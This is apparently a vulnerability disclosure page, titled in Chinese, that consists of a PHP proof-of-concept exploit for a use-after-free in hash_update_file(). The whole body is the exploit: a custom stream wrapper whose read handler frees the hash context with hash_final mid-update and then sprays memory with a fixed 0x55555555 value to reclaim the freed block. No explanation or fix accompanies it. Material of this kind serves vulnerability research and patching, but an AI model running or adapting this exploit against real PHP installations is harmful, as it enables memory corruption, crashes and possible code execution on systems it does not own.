PHP hash_update_file()函数访问已释放资源漏洞

<?php define("OFFSET", pack("L",0x55555555)); class AttackStream { function stream_open($path, $mode, $options, &$opened_path) { return true; } function stream_read($count) { hash_final($GLOBALS['hid'], true); $GLOBALS['aaaaaaaaaaaaaaaaaaaaaa'] = str_repeat(OFFSET, 3); return "A"; } function stream_eof() { return true; } function stream_seek($offset, $whence) { return false; } } stream_wrapper_register("attack", "AttackStream") or die("Failed to register protocol"); $hid = hash_init('md5'); hash_update_file($hid, "attack://nothing"); ?>